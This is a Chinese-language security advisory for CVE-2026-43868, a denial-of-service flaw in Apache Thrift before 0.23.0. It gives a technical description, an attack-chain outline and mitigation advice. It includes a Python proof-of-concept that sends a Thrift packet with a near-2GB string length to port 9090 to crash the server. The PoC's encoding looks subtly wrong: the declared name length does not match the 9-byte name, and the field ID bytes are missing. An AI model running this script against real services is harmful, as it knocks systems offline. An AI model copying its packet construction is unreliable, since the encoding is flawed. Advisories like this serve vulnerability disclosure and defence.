CVE-2026-43868 CVSS 5.3 中危

CVE-2026-43868 Apache Thrift 内存分配过大漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-43868

漏洞类型

拒绝服务

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Apache Thrift

漏洞概述

Apache Thrift 0.23.0之前的版本中存在内存分配大小值过大的漏洞。该漏洞由于未正确验证输入数据的长度参数，远程攻击者可通过网络发送特制的数据包，导致服务尝试分配过量内存，进而引发资源耗尽或服务崩溃，造成拒绝服务。

技术细节

该漏洞属于资源管理错误类型。在Apache Thrift处理反序列化数据时，对于用户输入的某些特定字段（如字符串、列表或二进制块）的长度校验逻辑存在缺陷。攻击者无需任何身份认证，即可通过网络向运行了受影响版本Thrift服务的服务器发送恶意构造的请求包。在这个请求包中，攻击者将表示数据大小的字段设置为一个极大的数值（例如接近整数上限的值）。当服务器解析该数据包并尝试根据该数值分配内存缓冲区时，由于数值过大，会导致系统尝试分配超出物理可用内存或虚拟内存限制的资源。这将触发操作系统层面的内存分配失败或导致服务进程因内存耗尽（OOM）而崩溃，从而造成拒绝服务。由于CVSS向量显示无用户交互且攻击复杂度低，该漏洞易于被自动化工具利用进行大规模攻击。

攻击链分析

STEP 1

侦察

扫描网络以识别开放Apache Thrift端口（默认9090）的服务。

STEP 2

武器化

构造包含超大长度字段的特制Thrift协议数据包。

STEP 3

投递

通过网络向目标服务器发送恶意数据包。

STEP 4

利用

目标服务器解析数据包，读取长度字段并尝试分配过量内存。

STEP 5

影响

服务器资源耗尽（OOM），服务进程崩溃，导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import struct

def exploit_poc(host, port):
    """
    Proof of Concept for CVE-2026-43868 (Memory Allocation with Excessive Size Value)
    This script sends a malicious Thrift message with a massive string length to trigger OOM.
    """
    try:
        # Connect to the target Thrift server
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        
        # Construct a malicious message header (simplified for demonstration)
        # Assuming a standard Thrift binary protocol header
        bad_message = b"\x80\x01\x00\x01"  # Strict protocol, message type
        bad_message += b"\x00\x00\x00\x0b"  # Message name length (11)
        bad_message += b"malicious"        # Message name
        bad_message += b"\x00\x00\x00\x00"  # Sequence ID
        
        # Payload: A string field with excessive length
        # Field ID 1 (type 11 - String)
        field_header = b"\x0B" 
        # Length: 2GB (approx) to force huge allocation
        length_bytes = struct.pack(">I", 0x7FFFFFFF) 
        
        payload = field_header + length_bytes
        # Note: We do not send the actual string data, just the length header,
        # as the server attempts allocation upon reading the length.
        
        full_packet = bad_message + payload
        
        print(f"[*] Sending malicious packet to {host}:{port}...")
        s.send(full_packet)
        print("[+] Packet sent. Check if the server crashed.")
        s.close()
        
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target_host = "127.0.0.1"
    target_port = 9090
    exploit_poc(target_host, target_port)

影响范围

Apache Thrift < 0.23.0

防御指南

临时缓解措施

如果无法立即升级，建议在防火墙或应用网关层面对传入的Thrift数据包大小进行严格限制，丢弃包含异常大数据包头的请求。同时，可以通过操作系统层面的资源限制（如ulimit）来限制进程的最大内存使用量，防止系统整体资源耗尽。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表